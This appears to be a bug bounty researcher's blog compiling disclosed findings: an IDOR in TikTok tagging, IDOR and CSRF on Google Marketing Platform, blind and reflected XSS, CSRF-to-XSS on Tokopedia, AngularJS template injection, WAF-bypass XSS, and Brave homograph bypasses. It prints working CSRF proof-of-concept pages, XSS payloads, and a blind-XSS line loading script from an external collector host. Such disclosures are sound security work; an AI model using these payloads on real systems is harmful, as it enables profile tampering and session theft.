Tag: Bug Bounty

Tag Myself in Your Favorite TikTok Artist Video [IDOR]

In the name of Allah, the Most Gracious, the Most Merciful.

Beginning

On H-1 Eidul Fitri I spent my time on in front of my laptop while listening to Takbir from the nearest mosque. Doing bug bounty and targeting TikTok mobile apps.

With my laptop and my old iPhone 6s+, I started to learn and try to hack TikTok in a good way. I’m focussing on the feature on the mobile apps and on the Access-Control issue.

Stuck

Because the theme of the hunt is the “Access-Control” Issue, I started poking around the TikTok feature related to what can and cannot the user access. Looking at my burp suite and navigating the TikTok Apps feature to there and here and there again, and here again. No clue, lost!

Get Some Clue

After stuck, I try to focus on the feature related to TikTok video. Long story short, I get some clue, looks like some endpoints is vulnerable with an IDOR! The tag feature! I try to change the video id to another video id but won’t work, strange! The status not reject the request or anything. There’s just video id and “add_uids” parameter on the post request.

But, I try again, I try to remove the tag and tag another people and change the video id to victim. it will add more parameter says “remove_uids” on the post request. It’s says success! And when I take a look the another video I see that I be able to tag someone on another users video!

But, It’s strange right? You need parameter “remove_uids” and you can be able perform IDOR, when I remove the parameter The IDOR not work as expected.

The Post Request will look like this:

POST /tiktok/interaction/mention/tag/update/v1?residence=ID&device_id=7049655035710670337&os_version=14.4.2&iid=7088340292101621530&app_name=trill&locale=en&ac=WIFI&sys_region=ID&js_sdk_version=&version_code=22.8.2&channel=App%20Store&op_region=ID&tma_jssdk_version=&os_api=18&idfa=192B53E4-8964-49BB-A03B-CB8EA01485BC&idfv=192B53E4-8964-49BB-A03B-CB8EA01485BC&device_platform=iphone&device_type=iPhone8,2&openudid=a498f4c031fe4de2f2e6315a610c39f9a847ee79&account_region=id&tz_name=Asia/Jakarta&tz_offset=25200&app_language=en&current_region=ID&build_number=228201&aid=1180&mcc_mnc=&screen_width=1242&uoo=1&content_language=&language=en&cdid=F1E3FFE9-7053-4600-8CC0-135AF4AAAF29&app_version=22.8.2 HTTP/2
Host: api22-normal-c-useast2a.tiktokv.com
Cookie: cookie
Content-Length: 101
Passport-Sdk-Version: 5.12.1
X-Tt-Token: token
X-Vc-Bdturing-Sdk-Version: 2.2.0
Content-Type: application/x-www-form-urlencoded
User-Agent: TikTok 22.8.2 rv:228201 (iPhone; iOS 14.4.2; en_ID) Cronet
X-Tt-Cmpl-Token: AgQQAPOgF-RP_Y_iXVdt8d04-7T-1C8LP4MrYMBsKg
Sdk-Version: 2
X-Tt-Dm-Status: login=1;ct=1;rt=1
X-Ss-Stub: E023E8928E9799DED6D72E7F9FA36DF8
X-Tt-Store-Idc: useast2a
X-Tt-Store-Region: id
X-Tt-Store-Region-Src: uid
X-Bd-Kmsv: 0
X-Ss-Dp: 1180
X-Tt-Trace-Id: 00-7b53c0751061d567e780940601e9049c-7b53c0751061d567-01
Accept-Encoding: gzip, deflate
X-Ladon: vWpFBboRv69O9ymA2KFoSIpQ1D0kJKThJcrTBC9/M5s1lfjm
X-Khronos: 1651336527
X-Argus: +HwVwzxC2/WbovVsHBeKOZ6naYMtWF34J2KwlChRY4np1DmEhtsSKSDNdF1kj+47hlAq4FS8/HcJS1NLRjTVFA3LVmHT+mbavL+CkP4+66qk2HzgUgq6tvlmaQXvwl972mDZkRSZIGSxkRjGn0vyELn7K0bW3qu5ZI3nwdAFMBwjMJ3WuPi83aqDPYVPYJ3Wnt5chQi/GSInydL8+Z36Xfn9gzRGPxio2mJCXjFDIRZhnQ9h1wQGQId9+qczY/oh0yN82ep5QniFYcntubeCvdqa63O9znKisMwXtDVLtxjCNhew/XuRuBWughHfvLktg0BBH9SRFV28HWZPI9sOJCSy
X-Gorgon: 8404c0f62000ffd118328cb21179ed3fe40bc3bc18252fb094cb

add_uids=%5B6868261750475621377%5D&aweme_id=7031653349946707201&remove_uids=%5B6948164304332555266%5D

Don’t care with this behaviour, I straight forward to record how I reproduce the IDOR and send it to TikTok on Hackerone.

Step To Reproduce

The clearly step to reproduce it will be like this:

  1. Tagged people on some video, and then untagged the people and changed to another people.
  2. See the response. Edit the aweme_id parameter to any aweme_id ID (Video ID)
  3. Take a look on the video with aweme_id you changed. The videos will be tagged people you tag on your video!

TikTok Team already fixed this issue quickly after I reported this to them.   

Conclusions

From this test case, I tell my self that I need to explore all feature and not assume same feature / endpoint not vulnerable based on test in 1 features.

Timeline

  • Apr 30th 2022 – Report via Hackerone
  • May 5th 2022 – Hackerone Staff Triaged
  • May 6th 2022 – Update the CVSS
  • May 13th 2022 – Resolved
  • Jun 7th 2022 – Bounty 2,500$ + 500$ Bonus

 

2 CSRF 1 IDOR on Google Marketing Platform

Found IDOR and CSRF Vulnerability on Google!

In this article, I would like to share when I found a bug on Google Products. I hope you can get some useful information on this writeup, let me know your feedback on this writeup on a comment section or on my twitter: Apapedulimu!

Once Upon a Time

So, I’m on break to bug hunting since November 2019 because a lot of things and of course lack of energy because facing many duplicates. In February I decide to bug hunting on my favorite please: Google. Although I’m not pro enough to hunt at Google, at least Google has many assets to look at it. So, it’ll fun when hunting on them. And then I ping up my friends and invite him to hunt together on Google, and he says YES! It’s always fun when to hunt together with your friends because we can share what we dig and the information we gain and have a quick chat. So, when we can’t find any bug at least we can have fun~

After that, I can’t find anything and run out of coffee. I decide to sleep and leave my friends to do the research. In the morning, he pings me up because looks like he found some interesting endpoint on marketingplatform.google.com. But, after taking a look it’s just working as intended.

Aim The Target

After that, I decided to take a look deeper into the subdomain(marketingplatform.google.com). And there’s some register page to become Google Partner. Idk the detail, In short, we can post our company on that site. I take a look at the feature on the website and try to understand the flow, register as usual (with including XSS payload of course) with some hope it’ll be pop up on some page. Take a look the payload XSS has just become Text! 🙁

Okay, XSS isn’t working on there, let’s move to take a look another basic vulnerability, try the IDOR or Broken Access Control, let’s change the ID! But wait, it’s a lot ID to change, I exactly don’t know what ID to change :(. Let just request another request on other accounts and see the different ID on both requests!

Get Some Clue!

After some take a look at both request deeper, I realize if there’s some different ID and 4 in total, and the ID is exactly on the referer. I assume the ID is reflected from the ID on the public URL. But there’s some ID it’s totally different, it’s taken me time to think where the ID comes from, and then I decided to just delete it and see what happened when I send the request after changing the ID!

IDOR on Edit Profile!

After the deleted the ID where I don’t know the ID come from, I send the request and just return [1] on the response. Hmmm, Okay! Let’s reload the victim profile. When I reload the victim profile, it’s just changed to data I send it before! It means IDOR right! After double-check it, I can confirm it’s and IDOR. So, this is the POC for this :

IDOR Step To Reproduce :

  1. Go to https://marketingplatform.google.com/about/partners/create-listing, register as a partner and go to “edit listing”
  2. Intercept the request via burp
  3. Change the ID on burp with another user ID
  4. Make sure the third user ID is applying on the right parameter, and delete the last parameter ID in the end.
Vulnerable IDOR Request
Vulnerable IDOR Request

Video: 

https://youtu.be/JDwJa9P4xos

After I confirm the IDOR I quickly make a report and send it to Google VRP!

CSRF on Edit Profile!

IDOR report has been sent, and then I am trying to relax and keep in my mind if the IDOR might be duplicate. So, never celebrate too early. After some relax and enjoy my Kapal Api Coffee. I try to take a look at my burp history, do something interesting happened when I’m not aware of it?

After some take a look at my burp history, I realize if the Edit Profile Request doesn’t contain any CSRF token, it’s mean the endpoint is also vulnerable with CSRF Attack? Since the required ID is can be accessed publicly, the attacker can be gain the ID of the victim and send malicious links who contain CSRF Attack to the victim!

I quickly try to reproduce the CSRF Attack to confirm the endpoint is vulnerable with CSRF Attack, I use this script :

<title>CSRF on Marketing Platform Google</title>

//parameter ID : https://marketingplatform.google.com/about/partners/company/5148764629106688/gacp/5139310734999552/service/5199468395757568

<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://marketingplatform.google.com/about/partners/services/listing/save", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xhr.send('[[["first-parameter",[null,"hacked by hacker ","merauke","1231231",null,"AS","-8.4991117,140.4049814","hacker@gmail.com","0831231911"],null,[null,null,"victim","https://hacker.com",null,null,"hacked by hackerr ",null,null,null,null,null,null,null,null,null,null,null,null,null,""],null,null,[null,"hacked by hackerr ","hacked by hackerr","hacker@gmail.com","08318273191"],null,null,[]],[null,null,null,[null,null,"Full-Service Digital",null,null,[],["Large Business"],null,null,"",null,[],null,[],null,null,"third-parameter"],[],[],[],[],null,null,null,[],[],"second-parameter",[[null,"hacked by hackerr","hacked by hackerr","123151",null,"DZ","-8.4991117,140.4049814","victim@gmail.com","08310293801",true,null,null,null]]]]]');
}
</script><center>
<h1>CSRF To Edit Profile</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

I successfully perform the CSRF Attack on that endpoint with this Step To Reproduce:

Steps to reproduce:

  1. Save the ID and edit the parameter with the parameter of victim company and save .html
  2. Click the exploit.
  3. The Profile will be changed

Yes! I Confirm if the CSRF Attack is possible and quickly report them to Google VRP.

But wait, since I reported the IDOR issue first The VRP Team believes if the IDOR fix might also fix the CSRF vulnerability. So, to get the “Nice Catch” email, I must wait for the IDOR issue fixed first, and then if the CSRF still exists, I will get the “Nice Catch” Email! Fair enough.

And Another CSRF on Register Page!

After found CSRF on edit profile I started to focus to find another CSRF, I double-checks burp history to find request without any CSRF Token / CSRF Protection. And then I found the CSRF at the beginning I hunt on that subdomain. The Register page! I try to make simple script to reproduce CSRF. The script is like this :

<title>CSRF on Marketing Platform Google</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://marketingplatform.google.com/about/partners/services/become_gacp/create_company", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xhr.send('["","Hacked By Hacker!!!!!!!!","400","ID"]');
}
</script><center>
<h1>CSRF To Overwrite Current Register Data</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

Sure, the endpoint is vulnerable with CSRF Attack. But, what is the impact? And it’s just register page, right? After some take a look on the subdomain, I realize if user can register a new company while he has done the register and the latest data can be overwrite by a new data. So, the attacker can trick the victim when victim register his company and under review by the Google Team, attacker can launch the CSRF Attack at his company and the data who not yet review will overwrite with a new data.

Okay! So, this is the Step To Reproduce :

  1. Register your account to partner on https://marketingplatform.google.com/about/partners/create-listing and go to your profile ( click view draft )
  2. Go to https://labs.apapedulimu.click/exploit/google/csrf-register-marketingplatform.html ( I’ve made the script to perform CSRF )
  3. Refresh your profile, your profile name will change to “Hacked By Hacker!!!! “

After that, I quickly sent the report to Google VRP!

Timeline :

  • Feb 7, 2020 – Reported IDOR
  • Feb 8, 2020 – Reported CSRF (Register Page)
  • Feb 15, 2020 – Nice Catch! IDOR
  • Feb 15, 2020 – Nice Catch! CSRF
  • Feb 16, 2020 – Reported Another CSRF ( Edit Profile )
  • Feb 21, 2020 – Make a deal on CSRF ( Wait until IDOR Fixed )  to get “Nice Catch”
  • Mar 4, 2020 – Awarded 3,133.70 ( IDOR )
  • Mar 4, 2020 – Awarded 500 ( CSRF on Register PAge )
  • Mar 14, 2020 – Fixed ( CSRF on Register Page & IDOR on Edit Profile )
  • Mar 14, 2020 – Follow Up The CSRF on Edit Profile ( Still vulnerable )
  • Mar 31, 2020 – Nice Catch!
  • Apr 14, 2020 – Awarded 500 (CSRF on Edit Profile)
  • May 2, 2021 – Marked as Won’t Fix (CSRF on Edit Profile)

[Google VRP] How I Get Blind XSS At Google With Dork (First Bounty and HOF )

I’m rioncool22, based on North Sumatera, Indonesia

Entering the Google Hall of Fame is one of my dreams. A lot of my time was spent looking for vulnerabilities on Google, but it didn’t work out. Until one day I received a notification from XSSHunter that my payload was executed on the googleplex.com subdomain :D.

To look for this vulnerability, I used Google Dorking to make the search easier.

Dork : site:support.google.com inurl:/contact/ 

If you searching with this dork, You will find lots of contact forms.

After some searching, i found this link https://support.google.com/cloud/contact/prod_issue 😀

Fill XSSHunter Payload in the name and get executed in Google Admin Panel

Step To Reproduce : 
1. Open this link https://support.google.com/cloud/contact/prod_issue
2. Fill Subject, Full Description, and Affected product with XSS hunter Payload
3. XSS will be executed in googleplex.com subdomain 😀

Tips : You can upgrade the dork with another word, like “fill out this form” to find more contact forms 😀

Timeline :

  • 26 Feb 2020 : Submit Report To Google VRP
  • 27 Feb 2020 : First Respond From Google VRP
  • 28 Feb 2020 : Nice catch!!!
  • 25 Mar 2020 : Bounty Awarded $3133.70
  • 11 Mar 2021 : Public Disclosure

Get in touch with me on :

 

 

Exploiting XSS in POST requests on semrush.com

Recently, I’ve found something new for me , and I found this on www.semrush.com some bug bounty program on hackerone  . And it’s first time I’ve found XSS on hackerone program. So, This is the story.

While I’am looking around on semrush.com , try to one page and another page, put some payload on all field, and end on page https://www.semrush.com/my-posts/  this page is can be post something, and you able write everything you want. I try to put some xss payload on the field , but nothing happen.

Then, I try to upload some image, And the interesting time begin. I try to upload malicious filename on that page. It’s looks like this.

I take a long time to analyzing the request and response when I upload some image, but after a cup of coffee, help me to focus, and I notice the parameter CKEditorFuncNum on request is reflected on response. I try to write some text and see the result, is reflect on response

After know is reflected , I use payload XSS to trigger the XSS with payload like this : </script><script>alert(document.domain)</script> and it’s execute as script!.

After know this, I made simple HTML to execute this, and the code is like this :

<html>
  <body>
    <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

And whenever user click Submit Request, The XSS will be fired UP!

This is mark as valid from semrush security team. It’s has been fixed very well. More Experience I Get.

You can visit on hackerone report : https://hackerone.com/reports/375352

Blind XSS in Admin Panel on Name Parameter

Description :

Blind XSS is fired up on admin panel on name parameter, While the register there’s a field Full Name, I fill it with XSS Payload, I use XSSHunter to execute this. In a Next day I’ve found my XSS result on XSShunter dashboard through their admin Panel, I able to showing admin IP / Cookies / Path of admin, and etc. Maybe the admin will activate / reviewing the user registration.

PoC :

1. Register new account and fill the Field Full name with Payload From XSSHunter. ( “><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait on the Next Day.

Impact :

Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.

How Do you Know it’s Blind XSS on admin page?

Actually, Im not sure at the first time I found, After registering my account, I get the email from website to confirm my account, And my name going to ">  in my recent test, I use that payload just showing "> and XSS payload will execute,

Verify my email address from website.

I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.

Note : The team request limited disclosure.

I contacted the team via their contact page. And got positive report from them, After seeing my report they fix the vuln and will send me some SWAG. Yay!

Thanks.

Chaining CSRF With Self-Stored XSS On Tokopedia

Summary :

At the first time, I found Self-Stored XSS on Tokopedia in their template message, In Tokopedia have feature template message to chat seller with common question like “This Goods Is Ready, What Is The Variant color, and etc”. User can set the template message by their self, and I try to insert the payload XSS on the template message , and when I open the message, the XSS will be pop up, And I assume this is Self-Stored XSS. And after that I think if Self-Stored XSS not high enough because the user must be input the payload to their template. And I try to dig the Request And I found some JSON request without Token on their endpoint, and the content-type not checked by their system and I think it will be Valid CSRF. So, I try to chain that bug in one action.

Step to reproduce :

  • Create .html code like this :
<title>CSRF To XSS on tokopedia</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://chat.tokopedia.com/tc/v1/update_chat_templates", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");

xhr.send('{"is_enable":true,"templates":["Bisa dikirim hari ini
ga?","Terima kasih!","<script>alert(document.domain);//"]}');
}
</script><center>
<h1>CSRF To XSS On tokopedia</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

The code will be send request to https://chat.tokopedia.com/tc/v1/update_chat_templates endpoint to add template message [“Bisa dikirim hari ini ga?”,”Terima kasih!”,”<script>alert(document.domain);//”] . Who included by Payload XSS.

So, when victim visit that link,  will be added payload XSS to their template message, and when victim try to chat with some seller, the XSS will be execute.

Video :

Timeline :

  • Sun, Feb 25, 2018 at 2:31 PM : Report Send
  • Sun, Feb 25, 2018 at 3:34 PM : Tokopedia Team answer will investigate
  • Mon, Feb 26, 2018 at 10:11 AM : Tokopedia Team Mark as Duplicate the XSS ( Found By Internal Team ) and CSRF mark as LOW Severity
  • Tue, Feb 27, 2018 at 9:09 AM : Try to explain the CSRF to get Medium Severity >.<
  • Tue, Feb 27, 2018 at 10:52 AM : Tokopedia Team Mark XSS & CSRF Valid with Medium Severity because the endpoint is different with internal team report
  • Thu, Mar 1, 2018 at 9:57 PM : Tokopedia Fixed The XSS , and tell CSRF not be fixed because the endpoint will changed soon.
  • Wed, Mar 21, 2018 : Rewarded! Yay!

Thanks.

Original Report [ID] : https://drive.google.com/file/d/0B3hUlq3mDkikVXRWdEdBalpmZVlncFFqU3JXSFpFTkFnSGkw/view

Bypassing Homograph Attack Using `@` On Brave Browser

After a few month not hunting bug, and i want to hunt again. I read my previous report about Bypassing Homograph and look at the patch code. And I think I can bypass it, with some trick.

I see code on Brave Github patch on previous report, and with minimum programming skill try to bypassing homograph. I notice on their code is something like this. :

it('returns the punycode URL when given a valid URL', function () {
    assert.equal(urlUtil.getPunycodeUrl('http://brave:brave@ebаy.com:1234/brave#brave'), 'http://brave:brave@xn--eby-7cd.com:1234/brave#brave')
})

I notice on url between @ , the URL after @ is containing punycode, and get return to ASCII , and my weird logic think if before @ the punycode it’s doesn’t return to ASCII,

And this is How I Reproduce it  :

This is punycode URL ebаy.com@ebаy.com = xn--eby-7cd.com@xn--eby-7cd.com .

Set it to homepage

Attempt : 
- ebаy.com@ebаy.com it'll become = ebаy.com@xn--eby-7cd.com 
- ebаy.com/ebаy.com it'll become = xn--eby-7cd.xn--com/eby-7fg.com
- ebаy.com/@ebаy.com it'll become = ebаy.com/@xn--eby-7cd.com

And this is true before @ doesn’t return to ASCII ,  so to visit the link before @ i give / after punycode. So, when user input ebаy.com/@apapedulimu.click user will redirect to : xn--eby-7cd.com

Video :

And I report to Brave tim on Hackerone , you can see my report on : https://hackerone.com/reports/317931 . The brave tim very fast when patching it. And i got rewarded with bounty. Yeay!

And I say thanks to them with some GIF because very fast reply and patching although there’s just minor bug.

This is the GIF

You can see the patching on their github also on : https://github.com/brave/browser-laptop/issues/13214

Thanks

Reflected XSS On Search Product via AngularJS Template Injection [ Bukalapak.com ]

Description :

I’ve found Reflected XSS on www.bukalapak.com via AngularJs , I found this by write {{31338-1}} on their search page and found result 31337 . And i also read h1 report from ysx  for my reference to exploit this.

And I use payload from ysx to exploit AngularJS with {{constructor.constructor(‘alert(document.domain)’)()}} payload.

POC (Piye Om Carane ):

  1. login to account
  2. insert the payload to search field
  3. and XSS will fire up

POC URL :

https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D

Screenshoot :

It fixed 1 day after I report to them.

Reference :

  1. https://hackerone.com/reports/230234
  2. http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Note: I got permission to disclose this report from bukalapak

For Indonesia Languange, you can see my original report on : https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3

Thanks!

Bypass Stored XSS on User Edit [ MatahariMall.com ]

Description

I’ve found Stored XSS on user edit in name field, actually MatahariMall.com have WAF to protect it, but i found some payload to bypass it.

Detail : 

Location Of Bug : 

https://www.mataharimall.com/user/edit

Payload : 

"'--!><Script /K/>confirm(1)</Script /K/>#

Step To Reproduce :

  1. Login to your MatahariMall account
  2. Go to User Edit
  3. Add your name with Payload
  4. Save it

It will showing up the XSS and when you access another page, it also will showing up, because the name of your account will be displayed at another page.

Browser :

  1. Chrome And Firefox

Note :

Team of MatahariMall.com fix the bug after 1 day I send report, Wow!

 

Video :

Bypassing XSS

So, after them patching my previous report i going to bypass it, and i bypass it with new payload.

Payload : –!”><svg/onload=confirm(“1”)>

And it pop up the XSS,

it’s a many way to bypass the firewall.

Thanks,

Homograph Attack Bypass On Brave Browser


Hi guys, at this time i try to test Brave Browser , because i challenge myself to test something except website application and will see what i can do with it. While I search about Browser bug in hackerone.com I find report about Homograph attack in browser at 175286 and I try it, but its has been patched, so I find another way to attack it. And I try to read more reference about browser and i read URI Obfuscation  that give me idea how about adding @ when add punycode ? and boom. Its work, Brave Browser not validate a url properly like previous report. And This is My Report, but before i send report I check it on chrome, and the chrome response is showing the true URL.

Summary:

At #175286 you has been patched, and i try it work, but i’ve another way to bypass it. when we add a site to our Homepage with @, it’s not validate a url properly, make sure it’s display the punycode.

Products affected:

Brave 0.18.36 ( Linux & Windows )

Steps To Reproduce:

  • In browser add homepage with IDN @ebаy.com/
  • Now close and open browser again
  • You can see it’s redirect to http://xn--eby-7cd.com/

Video :

And two days after that the Brave team update my report to triaged and give me bounty ( half of first reporter ) , but i not satisfied with that (Am I so greedy ) >.< , and ask information, why ? and Brave team said “this was awarded lower because it requires the URL to start with ‘@’ which users would probably notice since it looks odd” and i think its true, so i dig it again, how can I attack it without ‘@’ and I try different way to attack it, and I’ve found the ‘@’ not required on url, so just use URL like this ebаy.com/ . And the Brave team said “seems valid” and give me extra bounty. Yay !

Thanks.